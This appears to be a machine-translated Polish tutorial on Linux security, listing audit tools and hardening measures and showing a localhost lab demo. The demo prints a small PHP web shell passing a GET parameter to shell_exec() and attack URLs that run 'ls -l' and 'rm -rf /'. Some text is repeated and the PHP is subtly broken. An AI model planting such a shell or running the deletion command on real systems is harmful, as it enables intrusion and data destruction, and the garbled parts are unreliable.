Hacking Linux OS: Hacking with Ubuntu (Commands Tutorial)

Linux jest najczęściej używanym systemem operacyjnym dla serwerów, szczególnie dla serwerów internetowych. Jest open source; oznacza to, że każdy może mieć dostęp do kodu źródłowego. To czyni go mniej bezpiecznym w porównaniu z innymi systemami operacyjnymi, ponieważ osoby atakujące mogą badać kod źródłowy w celu znalezienia luk. Linux dla hakerów jest o wykorzystywaniu tych luk w celu uzyskania nieautoryzowanego dostępu do systemu.

W tym artykule, wprowadzimy Cię do tego, co Linux jest, jego luki w zabezpieczeniach, hacking z Ubuntu i środki zaradcze, które można umieścić w miejscu.

Tematy poruszane w tym poradniku

  • Krótka notatka na temat Linuksa
  • Narzędzia do hakowania Linuksa
  • Jak zapobiegać włamaniom do Linuksa
  • Działanie hakerskie: Hack a Linux system using PHP

Quick Note on Linux

Linux jest systemem operacyjnym typu open source. Istnieje wiele dystrybucji systemów operacyjnych opartych na Linuksie, takich jak Redhat, Fedora i Ubuntu, itp. W przeciwieństwie do innych systemów operacyjnych, Linux jest mniej bezpieczny, jeśli chodzi o bezpieczeństwo. W przeciwieństwie do innych systemów operacyjnych, Linux jest mniej bezpieczny jeśli chodzi o bezpieczeństwo. Dzieje się tak dlatego, że kod źródłowy jest dostępny za darmo, więc łatwo jest go zbadać pod kątem luk i wykorzystać je w porównaniu do innych systemów operacyjnych, które nie są open source. Linux może być używany jako serwer, desktop, tablet lub system operacyjny dla urządzeń mobilnych.

Programy Linux mogą być obsługiwane za pomocą GUI lub poleceń. Polecenia Linux dla Kali Linux hacking są bardziej skuteczne i wydajne w porównaniu do korzystania z GUI. Z tego powodu, pomaga znać podstawowe komendy Linuksa do hakowania.

Odnieś się do tych samouczków https://www.guru99.com/unix-linux-tutorial.html jak zacząć z Kali Linux hacki.

Linux Hacking Tools

  • Nessus- to narzędzie może być użyte do hakowania Ubuntu, skanowania ustawień konfiguracyjnych, poprawek i sieci itp. można je znaleźć na stronie https://www.tenable.com/products/nessus
  • NMap. To narzędzie może być używane do monitorowania hostów, które są uruchomione na serwerze i usług, które wykorzystują. Może być również użyte do skanowania portów. Można go znaleźć pod adresem https://nmap.org/
  • SARA – SARA jest akronimem od Security Auditor’s Research Assistant. Jak sama nazwa wskazuje, narzędzie to może być używane do audytu sieci przed zagrożeniami takimi jak SQL Injection, XSS itp. można go znaleźć na stronie http://www-arc.com/sara/sara.html

Powyższa lista nie jest wyczerpująca; daje wyobrażenie o narzędziach dostępnych dla hakowania Ubuntu i hakowania systemów Linux.

Jak zapobiec Linux hacks

Linux Hacking wykorzystuje luki w systemie operacyjnym. Organizacja może przyjąć następującą politykę, aby chronić się przed takimi atakami.

  • Zarządzanie łatami – łaty naprawiają błędy, które napastnicy wykorzystują do kompromitacji systemu. Dobra polityka zarządzania łatami zapewni, że stale będziesz aplikował odpowiednie łatki do swojego systemu.
  • Właściwa konfiguracja systemu operacyjnego- inne exploity wykorzystują słabości w konfiguracji serwera. Nieaktywne nazwy użytkowników i daemony powinny być wyłączone. Domyślne ustawienia, takie jak wspólne hasła do aplikacji, domyślne nazwy użytkowników i niektóre numery portów powinny zostać zmienione.
  • System wykrywania włamań- takie narzędzia mogą być używane do wykrywania nieautoryzowanego dostępu do systemu. Niektóre narzędzia mają zdolność do wykrywania i zapobiegania takim atakom.

Hacking Activity: Hack a Ubuntu Linux System using PHP

W tym praktycznym scenariuszu, nauczymy się jak włamać się do Ubuntu i dostarczymy Ci podstawowych informacji na temat tego, jak można użyć PHP do kompromitacji Linuksa. Nie zamierzamy celować w żadną ofiarę. Jeśli chcesz to wypróbować, możesz zainstalować LAMPP na swojej lokalnej maszynie.

PHP posiada dwie funkcje, które mogą być użyte do wykonania komend hakerskich w Linuksie. Posiada funkcje exec() i shell_exec(). Funkcja exec() zwraca ostatnią linię wyjścia polecenia, podczas gdy shell_exec() zwraca cały wynik polecenia jako łańcuch znaków.

Dla celów demonstracyjnych załóżmy, że atakujący menedżerowie umieszczają na serwerze WWW następujący plik.

<?php$cmd = isset($_GET) ? $_GET : 'ls -l';echo "executing shell command:-> $cmd</br>";$output = shell_exec($cmd);echo "<pre>$output</pre>";?>

TUTAJ,

Powyższy skrypt pobiera polecenie ze zmiennej GET o nazwie cmd. Polecenie jest wykonywane przy użyciu shell_exec(), a wyniki zwracane w przeglądarce.

Powyższy kod może zostać wykorzystany przy użyciu następującego adresu URL

http://localhost/cp/konsole.php?cmd=ls%20-l

TUTAJ,

  • „…konsole.php?cmd=ls%20-l „przypisuje wartość ls -l do zmiennej cmd.

Polecenie w Ubuntu służące do włamania się na serwer zostanie wykonane jako

shell_exec('ls -l') ;

Wykonanie powyższego kodu na serwerze WWW daje wyniki podobne do poniższych.

Powyższe polecenie po prostu wyświetla pliki w bieżącym katalogu i uprawnienia

Załóżmy, że atakujący przekaże następujące polecenie

rm -rf /

TUTAJ,

  • „rm” usuwa pliki
  • „rf” sprawia, że polecenie rm działa w trybie rekursywnym. Usuwa wszystkie foldery i pliki
  • „/” instruuje polecenie, aby rozpoczęło usuwanie plików z katalogu głównego

Adres URL ataku wyglądałby mniej więcej tak

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Podsumowanie

  • Linux jest popularnym systemem operacyjnym dla serwerów, komputerów stacjonarnych, tabletów i urządzeń mobilnych.
  • Linux jest systemem open source, a kod źródłowy może uzyskać każdy. To sprawia, że łatwo jest wykryć luki w zabezpieczeniach. Jest to jeden z najlepszych OS dla hakerów.
  • Podstawowe i sieciowe komendy hakerskie w Ubuntu są cenne dla hakerów Linux.
  • Podatności są słabością, która może być wykorzystana do kompromitacji systemu.
  • Dobre zabezpieczenie może pomóc chronić system przed naruszeniem przez atakującego.

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany.